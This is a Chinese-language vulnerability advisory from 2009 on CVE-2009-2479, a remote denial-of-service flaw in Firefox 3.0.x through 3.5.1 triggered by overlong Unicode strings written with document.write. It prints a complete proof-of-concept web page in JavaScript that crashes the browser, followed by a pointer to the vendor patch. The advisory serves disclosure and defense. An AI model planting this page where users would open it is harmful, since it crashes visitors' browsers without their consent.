Firefox Unicode数据远程拒绝服务漏洞
来源:岁月联盟
时间:2009-07-29
Mozilla Firefox 3.5.1
Mozilla Firefox 3.5
Mozilla Firefox 3.0.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 35707
CVE(CAN) ID: CVE-2009-2479
Firefox是Mozilla所发布的开源WEB浏览器。
如果用户使用Firefox访问了恶意网页并向document.write方式传送了恶超长的Unicode数据字符串的话,就可以触发栈溢出,导致浏览器崩溃。
<*来源:Andrew Haynes
链接:https://bugzilla.mozilla.org/show_bug.cgi?format=multiple&id=504343
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有安全性,仅供安全研究与教学之用。使用者风险自负!
<html>
<head>
<script language="JavaScript" type="Text/Javascript">
var str = unescape("%u4141%u4141");
var str2 = unescape("%u0000%u0000");
var finalstr2 = mul8(str2, 49000000);
var finalstr = mul8(str, 21000000);
document.write(finalstr2);
document.write(finalstr);
function mul8 (str, num) {
var i = Math.ceil(Math.log(num) / Math.LN2),
res = str;
do {
res += res;
} while (0 < --i);
return res.slice(0, str.length * num);
}
</script>
</head>
<body>
</body>
</html>
<html><body></body></html>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Mozilla
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.mozilla.org/
